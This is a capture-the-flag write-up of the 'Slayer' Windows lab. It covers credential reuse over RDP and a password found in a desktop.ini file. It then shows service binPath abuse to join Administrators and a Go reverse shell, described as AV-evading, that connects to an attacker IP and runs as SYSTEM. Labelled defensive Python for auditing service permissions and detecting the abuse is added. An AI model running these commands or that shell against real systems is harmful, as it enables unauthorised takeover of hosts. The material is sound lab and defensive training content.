Slayer

Challenge Lab (Easy) - by Ryan Yager

The following post by 0xb0b is licensed under CC BY 4.0


Scenario

Objective and Scope

Following a successful social engineering engagement, you have obtained user-level credentials for a corporate workstation. Your objective is to leverage this initial access to perform deep reconnaissance on the internal Windows host. The final goal is to escalate privileges and capture the root flag from the administrator's directory to demonstrate full system compromise.

Starting Credentials

tyler.ramsey:P@ssw0rd!

Summary

In this engagement we gain interactive access to the Windows host by authenticating with available user credentials and pivoting to a more privileged account. Enumeration uncovers a misconfigured management service whose insecure configuration and filesystem permissions allow us to escalate the privileged user into the local Administrators group and recover the Administrator flag. Finally, by abusing the same service to run a custom payload we obtain a SYSTEM-level shell, demonstrating a full attack chain from initial access to complete host compromise while avoiding noisy detections.

Recon

We start with a rustscan followed by a service and default-script scan (-sC -sV), and find ports 135 (RPC), 445 (SMB), 3389 (RDP) and 49670 (RPC) open.

rustscan -b 500 -a 10.1.236.103 -- -sC -sV -Pn

The host appears to be a Windows 10 machine, build 26100, named EC2AMAZ-M1LFCNO.

RDP via tyler.ramsey

We already have credentials from the scenario and test whether they allow an RDP logon, using NetExec. The authentication succeeds.

nxc rdp 10.1.236.103 -u tyler.ramsey -p 'P@ssw0rd!'

We connect with xfreerdp; Remmina or other RDP clients would work just as well.

xfreerdp +clipboard /u:tyler.ramsey  /p:'P@ssw0rd!' /v:10.1.236.103 /cert-ignore

RDP via alice.wonderland

As tyler.ramsey, we see that we do not have any special permissions.

In addition to tyler.ramsey, we also find another user account, alice.wonderland.

We use automated tooling to enumerate the target. To get it onto the machine, we host an SMB share with Impacket's smbserver.py.

smbserver.py -smb2support EXEGOL $(pwd) -username 0xb0b -password 0xb0b

We use PrivescCheck.ps1 for enumeration, which does not get detected by the AV.

We map the \\10.200.14.213\EXEGOL network share to the x: drive on the target, using the username 0xb0b and password 0xb0b that we chose for the share.

net use x: \\10.200.14.213\EXEGOL /user:0xb0b 0xb0b

Next, we copy the script from the share to the target.

copy x:\PrivescCheck.ps1 PrivescCheck.ps1    

We run the extended checks and let the script create a human-readable report.

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML"

In the summary, we can already see that services are likely to be a potential privilege escalation vector.

We copy the reports to our attacker machine.

copy PrivescCheck_EC2AMAZ-M1LFCNO.html x:\PrivescCheck_EC2AMAZ-M1LFCNO.html
copy PrivescCheck_EC2AMAZ-M1LFCNO.txt x:\PrivescCheck_EC2AMAZ-M1LFCNO.txt

We identify the SysMgmtAgent service as a potential candidate for privilege escalation, since the service's executable file (the ImagePath) has insecure file system permissions. We need to check whether we can write to the service binary and whether we are able to stop and start the service.

We can query the service, but we are not allowed to start it.

sc.exe query SysMgmtAgent
sc.exe start SysMgmtAgent
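A defender-side check for the misconfiguration described above, as an added example that is not part of the original writeup: the script parses a service security descriptor in the SDDL form that `sc sdshow <service>` prints and reports allow ACEs that give non-administrative principals change-config rights (which let the binPath be rewritten) or start/stop rights (which become relevant once the service binary itself is writable). The two sample descriptors, the severity labels and the trusted-SID list are assumptions of the example; the right abbreviations and access-mask bits are the standard ones for service objects.

```python
"""Audit a Windows service security descriptor (SDDL) for rights that let
non-administrators reconfigure, start or stop the service.

Added example, not part of the original writeup. Input is an SDDL string in the
form printed by `sc sdshow <service>`; the sample descriptors are constructed.
"""
import re

# Service object access rights: SDDL abbreviation -> (name, access-mask bit).
RIGHTS = {
    "CC": ("SERVICE_QUERY_CONFIG", 0x0001),
    "DC": ("SERVICE_CHANGE_CONFIG", 0x0002),
    "LC": ("SERVICE_QUERY_STATUS", 0x0004),
    "SW": ("SERVICE_ENUMERATE_DEPENDENTS", 0x0008),
    "RP": ("SERVICE_START", 0x0010),
    "WP": ("SERVICE_STOP", 0x0020),
    "DT": ("SERVICE_PAUSE_CONTINUE", 0x0040),
    "LO": ("SERVICE_INTERROGATE", 0x0080),
    "CR": ("SERVICE_USER_DEFINED_CONTROL", 0x0100),
    "SD": ("DELETE", 0x00010000),
    "RC": ("READ_CONTROL", 0x00020000),
    "WD": ("WRITE_DAC", 0x00040000),
    "WO": ("WRITE_OWNER", 0x00080000),
    "GA": ("GENERIC_ALL", 0x10000000),
    "GW": ("GENERIC_WRITE", 0x40000000),
}
# Rights that hand over control of the service definition, ImagePath included.
CONTROL = {"DC", "WD", "WO", "GA", "GW"}
# Rights needed to make a rewritten ImagePath (or a replaced binary) execute.
START_STOP = {"RP", "WP"}
# Principals expected to hold full control (assumption): Local System,
# Builtin Administrators, Server Operators.
TRUSTED_SIDS = {"SY", "BA", "SO"}
# Broad low-privilege well-known SIDs, for readable output.
WELL_KNOWN = {"AU": "Authenticated Users", "BU": "Users", "WD": "Everyone",
              "IU": "Interactive", "SU": "Service", "AN": "Anonymous"}

# ACE syntax: (type;flags;rights;object_guid;inherit_object_guid;sid)
ACE_RE = re.compile(
    r"\((?P<type>[^;]*);(?P<flags>[^;]*);(?P<rights>[^;]*);[^;]*;[^;]*;(?P<sid>[^)]*)\)")

# Constructed samples: the first mirrors the usual default DACL of a service,
# the second grants Authenticated Users change-config plus start/stop, the
# third grants only start/stop.
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPLOCRRC;;;AU)")
STARTSTOP_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                  "(A;;CCLCSWRPWPLOCRRC;;;AU)")


def _rights_set(field):
    """Decode the rights field, either two-letter abbreviations or a hex mask."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {abbr for abbr, (_, bit) in RIGHTS.items() if mask & bit}
    return {field[i:i + 2] for i in range(0, len(field), 2)}


def parse_dacl(sddl):
    """Return [(ace_type, rights, sid)] for the DACL; the SACL (S:) is ignored."""
    m = re.search(r"D:(.*?)(?:S:|$)", sddl)
    if not m:
        raise ValueError("no DACL (D:) component in SDDL string")
    return [(a.group("type"), _rights_set(a.group("rights")), a.group("sid"))
            for a in ACE_RE.finditer(m.group(1))]


def audit_service_sddl(sddl):
    """Findings for allow ACEs that give non-trusted principals control of,
    or the ability to start/stop, the service."""
    findings = []
    for ace_type, rights, sid in parse_dacl(sddl):
        if ace_type != "A" or sid in TRUSTED_SIDS:
            continue
        control, startstop = rights & CONTROL, rights & START_STOP
        if control:
            severity = "high"    # service can be pointed at another binary or command
        elif startstop:
            severity = "medium"  # only exploitable together with a writable binary
        else:
            continue
        findings.append({"sid": sid, "principal": WELL_KNOWN.get(sid, sid),
                         "severity": severity,
                         "rights": sorted(RIGHTS[r][0] for r in control | startstop)})
    return findings


if __name__ == "__main__":
    for name, sddl in (("default", DEFAULT_SDDL), ("weak", WEAK_SDDL),
                       ("start/stop only", STARTSTOP_SDDL)):
        print(name, audit_service_sddl(sddl))
```

To run it against a real host, feed the script the output of `sc sdshow <service>` for each service; a service whose binary additionally lives in a directory writable by the same principal turns a medium finding into the full chain used in this writeup, so the file ACL of the ImagePath should be checked alongside.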

We continue manually; we probably have to escalate to alice.wonderland first. In the root of C:\ we find a suspicious Management folder.

Besides some management files, the folder contains a desktop.ini file, which fortunately holds the credentials of alice.wonderland.

Get-ChildItem -Force | Format-Table Mode, LastWriteTime, Length, Name

We test whether these credentials allow an RDP logon, again using NetExec, and the authentication succeeds.

nxc rdp 10.1.236.103 -u alice.wonderland -p 'REDACTED'  

Next, we are using xfreerdp to connect to the target machine as alice.wonderland.

xfreerdp +clipboard /u:alice.wonderland  /p:'REDACTED' /v:10.1.236.103 /cert-ignore

Privilege Escalation

Returning to SysMgmtAgent, we check whether alice.wonderland can start the service, and this time it succeeds.

sc.exe query SysMgmtAgent
sc.exe start SysMgmtAgent

We stop the service again.

sc.exe stop SysMgmtAgent

Next, we try to elevate alice.wonderland by adding the user to the local Administrators group. We reconfigure the binPath of the SysMgmtAgent service so that, when the service starts, it runs the command that adds alice.wonderland to the local Administrators group.

sc.exe config SysMgmtAgent binPath= "cmd.exe /c net localgroup Administrators /add alice.wonderland"

Now we start the service, and see that the user alice.wonderland is now part of the local Administrators group.

sc.exe start SysMgmtAgent

Next, we start an elevated PowerShell session as Administrator and are able to retrieve the final flag at C:\Users\Administrator\root.txt.

Shell as NT Authority System

To get a reverse shell as NT AUTHORITY\SYSTEM we write a simple reverse shell in Go, which should not be easily detected by AV. However, we have to compile it on a Windows host.

0xb0b.go
package main

import (
    "net"
    "os/exec"
)

func main() {
    // Connect back to the listener on the attacker machine (Penelope on port 4445).
    c, err := net.Dial("tcp", "10.200.14.213:4445")
    if err != nil {
        return
    }
    defer c.Close()

    // Wire PowerShell's stdin, stdout and stderr to the socket. Started by the
    // service, the shell runs in the service's LocalSystem context.
    cmd := exec.Command("powershell")
    cmd.Stdin = c
    cmd.Stdout = c
    cmd.Stderr = c
    cmd.Run()
}

We build the reverse shell.

go build -o 0xb0b.exe 0xb0b.go

And we prepare a listener using Penelope. Penelope is a reverse shell handler that tries to auto-upgrade the caught reverse shell, fixes the TTY size and allows us to manage our

penelope -p 4445

We transfer the reverse shell to the target system, placing it at C:\Management\0xb0b.exe.

copy x:\0xb0b.exe 0xb0b.exe

Next, we set the binPath to C:\Management\0xb0b.exe.

sc.exe config SysMgmtAgent binPath= "C:\Management\0xb0b.exe"

We start the service...

sc.exe start SysMgmtAgent

... and receive a connection as NT Authority System.
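Both service abuses in this writeup leave the same trail: the ImagePath value under HKLM\System\CurrentControlSet\Services\SysMgmtAgent is rewritten by sc.exe, the service is started, and in the first case a member is added to the local Administrators group. The detection below is an added example, not from the original post. It runs over constructed JSON events shaped like Sysmon Event ID 13 (registry value set) and Windows Security Event ID 4732 (member added to a security-enabled local group), flags ImagePath values that contain a command interpreter or `net localgroup`, or that point at a binary outside the Windows and Program Files directories, and correlates each hit with a group change in a short window afterwards. The event values, the suspicious-token list, the trusted directories and the five-minute window are assumptions.

```python
"""Detect service ImagePath abuse of the kind shown in the writeup and correlate
it with local group changes.

Added example, not from the original post. SAMPLE_LOG is constructed: one JSON
object per line, shaped like Sysmon EID 13 (registry value set) and Security
EID 4732 (member added to a security-enabled local group); the values are made up.
"""
import json
import re
from datetime import datetime, timedelta

SAMPLE_LOG = r"""
{"EventID": 13, "UtcTime": "2025-01-15 10:02:11", "User": "EC2AMAZ-M1LFCNO\\alice.wonderland", "Image": "C:\\Windows\\System32\\sc.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\SysMgmtAgent\\ImagePath", "Details": "cmd.exe /c net localgroup Administrators /add alice.wonderland"}
{"EventID": 4732, "UtcTime": "2025-01-15 10:02:13", "TargetUserName": "Administrators", "MemberSid": "S-1-5-21-1111-2222-3333-1004", "SubjectUserName": "EC2AMAZ-M1LFCNO$"}
{"EventID": 13, "UtcTime": "2025-01-15 10:20:00", "User": "EC2AMAZ-M1LFCNO\\alice.wonderland", "Image": "C:\\Windows\\System32\\sc.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\SysMgmtAgent\\ImagePath", "Details": "C:\\Management\\0xb0b.exe"}
{"EventID": 13, "UtcTime": "2025-01-15 10:25:00", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\msiexec.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath", "Details": "C:\\Windows\\System32\\spoolsv.exe"}
{"EventID": 13, "UtcTime": "2025-01-15 10:26:00", "User": "EC2AMAZ-M1LFCNO\\tyler.ramsey", "Image": "C:\\Windows\\explorer.exe", "TargetObject": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive", "Details": "C:\\Users\\tyler.ramsey\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"}
"""

# Only registry writes to a service's ImagePath value are of interest.
SERVICE_KEY_RE = re.compile(r"\\Services\\(?P<svc>[^\\]+)\\ImagePath$", re.IGNORECASE)
# Interpreters and account-management commands that do not belong in an ImagePath (assumption).
SUSPICIOUS_TOKENS = ("cmd.exe /c", "cmd /c", "powershell", "net localgroup", "net user", "-enc ")
# Directories services are expected to run from (assumption; extend per environment).
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def parse_time(s):
    return datetime.fromisoformat(s.strip())


def _executable(image_path):
    """First token of an ImagePath: the quoted path, or everything up to the first space."""
    s = image_path.strip()
    if s.startswith('"'):
        return s[1:].split('"', 1)[0]
    return s.split(" ", 1)[0]


def imagepath_finding(event):
    """Finding for a Sysmon EID 13 event that rewrites a service ImagePath to
    something suspicious, otherwise None."""
    if event.get("EventID") != 13:
        return None
    m = SERVICE_KEY_RE.search(event.get("TargetObject", ""))
    if not m:
        return None
    value = event.get("Details", "")
    lowered = value.lower()
    reasons = [f"suspicious token {t!r}" for t in SUSPICIOUS_TOKENS if t in lowered]
    exe = _executable(lowered)
    # A bare name like cmd.exe is already caught by the token list; only judge full paths.
    if "\\" in exe and not exe.startswith(TRUSTED_DIRS):
        reasons.append("binary outside trusted directory")
    if not reasons:
        return None
    return {"service": m.group("svc"), "user": event.get("User"),
            "time": parse_time(event["UtcTime"]), "image_path": value,
            "reasons": reasons, "group_change": None}


def correlate(log_text, window=timedelta(minutes=5)):
    """Parse JSON-lines events, flag ImagePath abuse and attach any local group
    membership change (EID 4732) that follows within the window."""
    events = [json.loads(line) for line in log_text.strip().splitlines() if line.strip()]
    group_adds = [e for e in events if e.get("EventID") == 4732]
    findings = []
    for e in events:
        f = imagepath_finding(e)
        if f is None:
            continue
        for g in group_adds:
            t = parse_time(g["UtcTime"])
            if f["time"] <= t <= f["time"] + window:
                f["group_change"] = f"{g.get('MemberSid')} added to {g.get('TargetUserName')}"
                break
        findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_LOG):
        print(json.dumps(finding, default=str, indent=2))
```

On a real host the Sysmon EID 13 events only exist if the Sysmon configuration has a RegistryEvent rule covering the Services\*\ImagePath values, and EID 4732 requires the "Audit Security Group Management" subcategory to be enabled; with both in place, the first sample event pair is exactly the sequence produced by the net localgroup step above, and the second hit is the custom binary being registered.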
